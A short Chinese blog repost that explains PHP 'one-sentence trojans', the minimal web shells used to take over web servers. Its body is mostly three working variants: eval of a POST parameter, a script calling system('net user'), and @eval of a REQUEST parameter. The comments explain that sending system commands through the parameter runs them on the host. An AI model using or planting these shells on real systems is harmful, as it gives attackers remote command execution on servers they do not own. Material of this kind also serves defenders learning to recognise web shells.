标签：木马 一句 system eval 空时 PHP POST

一：

关于PHP的一句话木马：

1 <?php
2 
3 $a=$_POST['H'];
4 eval("$a");//eval会将输入的$a作为php语句执行，因此只要对_赋一定的system命令值，就能够执行系统命令
5 
6 ?>

显示结果：

二：

关于PHP的一句话木马：

1 <?php
2 $string=@$_POST["_"];
3 var_dump($string);
4 
5 echo "<br>";
6 eval("system('net user');");
7 
8 ?>

当POST参数_的值为空时：

 当不为空时：

三：

 使用REQUEST方法：

1 <?php
2 
3 @eval($_REQUEST[_]);//什么类型的，如POST，GET均可以接收
4 
5 ?>

显示结果：

GET型：

POST型：

标签：木马,一句,system,eval,空时,PHP,POST
来源： https://www.cnblogs.com/cute-puli/p/11118230.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。